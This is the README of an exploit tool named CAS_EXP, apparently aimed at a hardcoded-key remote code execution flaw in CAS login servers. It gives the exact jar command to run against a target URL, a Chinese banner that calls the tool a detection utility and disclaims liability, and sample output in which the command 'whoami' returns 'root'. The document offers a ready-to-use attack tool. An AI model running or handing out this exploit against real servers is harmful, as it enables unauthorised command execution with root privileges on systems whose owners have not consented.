CAS_EXP

CAS hardcoded remote code execution vulnerability

Usage

java -jar cas-0.0.1-all.jar http://localhost:8080/cas-server/login

-----------------------cas检测工具---------------------------------

-----------本软件仅供学习交流,如作他用所承受的法律责任一概与作者无关---------

---------use: jar -jar cas-0.0.1-all.jar http://xxxx.xxxx-------

-------------------create by maobugs----------------------------

执行命令whoami...

payload is: [base64 payload omitted]

执行结果是:root